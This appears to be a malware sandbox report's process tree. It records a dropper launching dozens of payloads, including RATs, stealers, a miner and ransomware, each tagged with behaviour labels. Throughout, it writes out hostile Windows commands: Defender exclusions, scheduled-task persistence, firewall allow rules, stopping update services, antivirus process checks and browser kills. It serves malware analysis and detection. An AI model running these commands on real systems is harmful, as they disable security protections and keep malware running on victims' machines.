C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SDASD.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SDASD.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5932
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SDASD" /tr "C:\Users\Admin\AppData\Local\Temp\SDASD.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5636
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\golden.exe"C:\Users\Admin\AppData\Local\Temp\Files\golden.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3100 -
C:\Users\Admin\AppData\Local\Temp\Files\golden.exe"C:\Users\Admin\AppData\Local\Temp\Files\golden.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6012
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\new_v8.exe"C:\Users\Admin\AppData\Local\Temp\Files\new_v8.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:6868
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4092
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"3⤵PID:6748
-
C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"C:\Users\Admin\AppData\Local\Temp\Files\stealinfo.exe"4⤵PID:7044
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test11.exe"C:\Users\Admin\AppData\Local\Temp\Files\test11.exe"3⤵PID:6384
-
-
C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-24_23-16.exe"C:\Users\Admin\AppData\Local\Temp\Files\build_2024-07-24_23-16.exe"3⤵PID:8792
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"3⤵PID:8932
-
C:\Users\Admin\AppData\Local\Temp\1019815822.exeC:\Users\Admin\AppData\Local\Temp\1019815822.exe4⤵PID:9588
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Impacts.bat" "2⤵PID:5488
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5796
-
-
C:\Windows\system32\findstr.exefindstr /I "wrsa opssvc"3⤵PID:5792
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6052
-
-
C:\Windows\system32\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"3⤵PID:3144
-
-
C:\Windows\system32\cmd.execmd /c md 5786783⤵PID:5364
-
-
C:\Windows\system32\findstr.exefindstr /V "PEACEFOLKSEXUALISLANDS" Hill3⤵PID:3716
-
-
C:\Windows\system32\cmd.execmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y3⤵PID:5940
-
-
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pifCooper.pif y3⤵
- Executes dropped EXE
PID:3704
-
-
C:\Windows\system32\choice.exechoice /d y /t 53⤵PID:3932
-
-
-
C:\Users\Admin\AppData\Local\Temp\SDASD.exe"C:\Users\Admin\AppData\Local\Temp\SDASD.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5712
-
-
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif"C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5688
-
-
C:\Users\Admin\AppData\Local\Temp\_MEI37442\Blsvr.exe"C:\Users\Admin\AppData\Local\Temp\_MEI37442\Blsvr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:4924
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5784
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4836
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4712
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1584
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3496
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2164
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:4632 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:6028
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5948
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5468
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5776
-
-
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"3⤵PID:6732
-
C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:7128
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\keygen.exe"C:\Users\Admin\AppData\Local\Temp\Files\keygen.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:2812
-
-
C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:6644
-
-
C:\Users\Admin\AppData\Local\Temp\Files\12.exe"C:\Users\Admin\AppData\Local\Temp\Files\12.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4580 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 3044⤵
- Program crash
PID:2908
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\444.exe"C:\Users\Admin\AppData\Local\Temp\Files\444.exe"3⤵PID:5152
-
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"4⤵PID:8120
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:8716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\payload.exe"C:\Users\Admin\AppData\Local\Temp\Files\payload.exe"3⤵PID:8164
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe"C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe"3⤵PID:4156
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\NJRat.exe" "NJRat.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:10020
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe"C:\Users\Admin\AppData\Local\Temp\Files\bundle.exe"3⤵PID:7284
-
-
C:\Users\Admin\AppData\Local\Temp\Files\hailhydra.exe"C:\Users\Admin\AppData\Local\Temp\Files\hailhydra.exe"3⤵PID:8000
-
C:\Users\Admin\AppData\Local\Temp\Files\hailhydra.exe"C:\Users\Admin\AppData\Local\Temp\Files\hailhydra.exe"4⤵PID:9936
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe"3⤵PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\Files\anne.exe"C:\Users\Admin\AppData\Local\Temp\Files\anne.exe"3⤵PID:6936
-
-
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"3⤵PID:4972
-
-
C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"3⤵PID:9412
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PaoNan.exe"C:\Users\Admin\AppData\Local\Temp\Files\PaoNan.exe"3⤵PID:4708
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cock.exe"C:\Users\Admin\AppData\Local\Temp\Files\cock.exe"3⤵PID:8196
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵PID:9192
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵PID:5236
-
C:\Users\Admin\Desktop\Files\InstallerPack_20.1.23770_win64.exe"C:\Users\Admin\Desktop\Files\InstallerPack_20.1.23770_win64.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5252 -
C:\Windows\SysWOW64\ftp.exeC:\Windows\SysWOW64\ftp.exe4⤵
- Suspicious behavior: MapViewOfSection
PID:5756 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- System Location Discovery: System Language Discovery
PID:6748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 19086⤵
- Program crash
PID:788
-
-
-
-
-
C:\Users\Admin\Desktop\Files\s.exe"C:\Users\Admin\Desktop\Files\s.exe"3⤵
- Suspicious use of SetWindowsHookEx
PID:6956
-
-
C:\Users\Admin\Desktop\Files\plantrojan.exe"C:\Users\Admin\Desktop\Files\plantrojan.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1140
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3428 -
C:\Users\Admin\Desktop\Files\Team.exe"C:\Users\Admin\Desktop\Files\Team.exe"3⤵PID:2228
-
-
C:\Users\Admin\Desktop\Files\Setup2.exe"C:\Users\Admin\Desktop\Files\Setup2.exe"3⤵PID:7396
-
-
C:\Users\Admin\Desktop\Files\o.exe"C:\Users\Admin\Desktop\Files\o.exe"3⤵PID:7888
-
-
C:\Users\Admin\Desktop\Files\pei.exe"C:\Users\Admin\Desktop\Files\pei.exe"3⤵PID:8084
-
C:\Users\Admin\AppData\Local\Temp\3162114300.exeC:\Users\Admin\AppData\Local\Temp\3162114300.exe4⤵PID:3564
-
-
-
C:\Users\Admin\Desktop\Files\t.exe"C:\Users\Admin\Desktop\Files\t.exe"3⤵PID:4160
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵PID:5556
-
C:\Users\Admin\Desktop\Files\svchost.exe"C:\Users\Admin\Desktop\Files\svchost.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6068
-
-
C:\Users\Admin\Desktop\Files\GOLD.exe"C:\Users\Admin\Desktop\Files\GOLD.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4820
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:864
-
-
-
C:\Users\Admin\Desktop\Files\DEF.exe"C:\Users\Admin\Desktop\Files\DEF.exe"3⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5252 -
C:\ProgramData\db\music.exe"C:\ProgramData\db\music.exe"4⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5216 -
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"5⤵
- Suspicious use of SetWindowsHookEx
PID:5932
-
-
-
-
C:\Users\Admin\Desktop\Files\5KNCHALAH.exe"C:\Users\Admin\Desktop\Files\5KNCHALAH.exe"3⤵PID:6288
-
-
C:\Users\Admin\Desktop\Files\seo.exe"C:\Users\Admin\Desktop\Files\seo.exe"3⤵PID:7532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit4⤵PID:7384
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7868
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:8124
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:7664
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"5⤵PID:7684
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4195915⤵PID:1640
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "SAVEDBEDFLESHPROVIDED" Waves5⤵PID:2060
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Poll + ..\Memorabilia + ..\Kenny + ..\Rick + ..\Britannica + ..\Circuits J5⤵PID:5160
-
-
C:\Users\Admin\AppData\Local\Temp\419591\Predicted.pifPredicted.pif J5⤵PID:6768
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:5308
-
-
-
-
C:\Users\Admin\Desktop\Files\main_v4.exe"C:\Users\Admin\Desktop\Files\main_v4.exe"3⤵PID:3580
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
PID:2324
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe4⤵
- Kills process with taskkill
PID:9840
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe4⤵
- Kills process with taskkill
PID:3148
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get Caption,Version4⤵PID:8924
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic os get InstallDate4⤵PID:1476
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command [CultureInfo]::InstalledUICulture.Name4⤵
- Command and Scripting Interpreter: PowerShell
PID:9700
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic cpu get Name,NumberOfCores,NumberOfLogicalProcessors,Manufacturer4⤵PID:8832
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic memorychip get Capacity4⤵PID:8788
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic path win32_videocontroller get Name4⤵
- Detects videocard installed
PID:7684
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵PID:6800
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic csproduct get UUID4⤵PID:3736
-
-
-
C:\Users\Admin\Desktop\Files\qth5kdee.exe"C:\Users\Admin\Desktop\Files\qth5kdee.exe"3⤵PID:8984
-
-
C:\Users\Admin\Desktop\Files\caspol.exe"C:\Users\Admin\Desktop\Files\caspol.exe"3⤵PID:6556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\Files\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:7684
-
-
C:\Users\Admin\Desktop\Files\caspol.exe"C:\Users\Admin\Desktop\Files\caspol.exe"4⤵PID:5528
-
-
C:\Users\Admin\Desktop\Files\caspol.exe"C:\Users\Admin\Desktop\Files\caspol.exe"4⤵PID:872
-
-
C:\Users\Admin\Desktop\Files\caspol.exe"C:\Users\Admin\Desktop\Files\caspol.exe"4⤵PID:7400
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6072 -
C:\Users\Admin\Desktop\Files\XClient.exe"C:\Users\Admin\Desktop\Files\XClient.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:1876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:3020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:724
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5124
-
-
-
C:\Users\Admin\Desktop\Files\up.exe"C:\Users\Admin\Desktop\Files\up.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:5348
-
-
C:\Users\Admin\Desktop\Files\rat.exe"C:\Users\Admin\Desktop\Files\rat.exe"3⤵PID:7316
-
C:\Users\Admin\Desktop\Files\rat.exe"C:\Users\Admin\Desktop\Files\rat.exe"4⤵PID:3304
-
-
-
C:\Users\Admin\Desktop\Files\AA_v3.exe"C:\Users\Admin\Desktop\Files\AA_v3.exe"3⤵PID:6272
-
-
C:\Users\Admin\Desktop\Files\peinf.exe"C:\Users\Admin\Desktop\Files\peinf.exe"3⤵PID:6404
-
-
C:\Users\Admin\Desktop\Files\naver.exe"C:\Users\Admin\Desktop\Files\naver.exe"3⤵PID:8580
-
-
C:\Users\Admin\Desktop\Files\Unit.exe"C:\Users\Admin\Desktop\Files\Unit.exe"3⤵PID:7124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 4484⤵
- Program crash
PID:9440
-
-
-
C:\Users\Admin\Desktop\Files\cc2.exe"C:\Users\Admin\Desktop\Files\cc2.exe"3⤵PID:6332
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:8060
-
-
-
C:\Users\Admin\Desktop\Files\Jigsaw.exe"C:\Users\Admin\Desktop\Files\Jigsaw.exe"3⤵PID:5160
-
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\Desktop\Files\Jigsaw.exe4⤵PID:9412
-
-
-
C:\Users\Admin\Desktop\Files\xt.exe"C:\Users\Admin\Desktop\Files\xt.exe"3⤵PID:7496
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵PID:3156
-
C:\Users\Admin\Desktop\Files\CrazyCoach.exe"C:\Users\Admin\Desktop\Files\CrazyCoach.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6504 -
C:\Users\Admin\Desktop\Files\update.exeC:\Users\Admin\Desktop\Files\update.exe 65044⤵PID:7964
-
-
-
C:\Users\Admin\Desktop\Files\Runtime%20Broker.exe"C:\Users\Admin\Desktop\Files\Runtime%20Broker.exe"3⤵PID:3364
-
-
C:\Users\Admin\Desktop\Files\MK.exe"C:\Users\Admin\Desktop\Files\MK.exe"3⤵
- Suspicious use of SetThreadContext
PID:584 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3692
-
-
-
C:\Users\Admin\Desktop\Files\nxmr.exe"C:\Users\Admin\Desktop\Files\nxmr.exe"3⤵PID:124
-
-
C:\Users\Admin\Desktop\Files\DiscordSpotifyBypass.exe"C:\Users\Admin\Desktop\Files\DiscordSpotifyBypass.exe"3⤵PID:9740
-
C:\Users\Admin\Desktop\Files\DiscordSpotifyBypass.exe"C:\Users\Admin\Desktop\Files\DiscordSpotifyBypass.exe"4⤵PID:8724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\CAD7.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\CAD7.tmp.zx.exe"2⤵PID:6260
-
C:\Users\Admin\AppData\Local\Temp\CAD7.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\CAD7.tmp.zx.exe"3⤵PID:7492
-
-
-
C:\Users\Admin\AppData\Local\Temp\CFD9.tmp.x.exe"C:\Users\Admin\AppData\Local\Temp\CFD9.tmp.x.exe"2⤵PID:5376
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:7400
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵PID:5616
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1804 -parentBuildID 20240401114208 -prefsHandle 1716 -prefMapHandle 1704 -prefsLen 24585 -prefMapSize 245185 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6463d61-482f-4fe9-a942-7e02e88ee856} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" gpu4⤵PID:2372
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2180 -parentBuildID 20240401114208 -prefsHandle 2172 -prefMapHandle 2168 -prefsLen 24585 -prefMapSize 245185 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {065ea452-c7fd-42f4-abf1-30b5a54174a8} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" socket4⤵PID:7324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3360 -childID 1 -isForBrowser -prefsHandle 3252 -prefMapHandle 3088 -prefsLen 25019 -prefMapSize 245185 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07d5aaf0-93ee-4a0f-89e1-1fe41c3453c5} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" tab4⤵PID:2536
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3452 -childID 2 -isForBrowser -prefsHandle 3420 -prefMapHandle 3416 -prefsLen 29376 -prefMapSize 245185 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bafa32f9-6544-476c-b136-bd1332b7da86} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" tab4⤵PID:6764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4436 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4440 -prefMapHandle 4244 -prefsLen 30260 -prefMapSize 245185 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0357381-9010-4366-9513-ea59f8d29fff} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" utility4⤵PID:2056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5368 -prefMapHandle 5364 -prefsLen 27835 -prefMapSize 245185 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ef5f026-4ec1-40ca-8b29-32fc8105a8a3} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" tab4⤵PID:8632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5776 -parentBuildID 20240401114208 -prefsHandle 5620 -prefMapHandle 5280 -prefsLen 30367 -prefMapSize 245185 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2348ad7c-ff24-4304-9a3a-3b8064a22955} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" rdd4⤵PID:7724
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5888 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 5860 -prefMapHandle 5856 -prefsLen 30367 -prefMapSize 245185 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0ea3575-d78c-4d4a-9885-bf3927f0ff71} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" utility4⤵PID:132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6056 -childID 4 -isForBrowser -prefsHandle 5860 -prefMapHandle 6044 -prefsLen 27835 -prefMapSize 245185 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {46d78c75-b277-435d-a3e1-9fde4f1e9c14} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" tab4⤵PID:4336
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6168 -childID 5 -isForBrowser -prefsHandle 6176 -prefMapHandle 6180 -prefsLen 27835 -prefMapSize 245185 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {353102e6-0f6d-4f0e-87ef-c317a2a5c6dd} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" tab4⤵PID:2904
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6368 -childID 6 -isForBrowser -prefsHandle 6376 -prefMapHandle 6384 -prefsLen 27835 -prefMapSize 245185 -jsInitHandle 1336 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2088fbd7-b3e4-4ece-bb2f-de70ab855936} 5616 "\\.\pipe\gecko-crash-server-pipe.5616" tab4⤵PID:7384
-
-
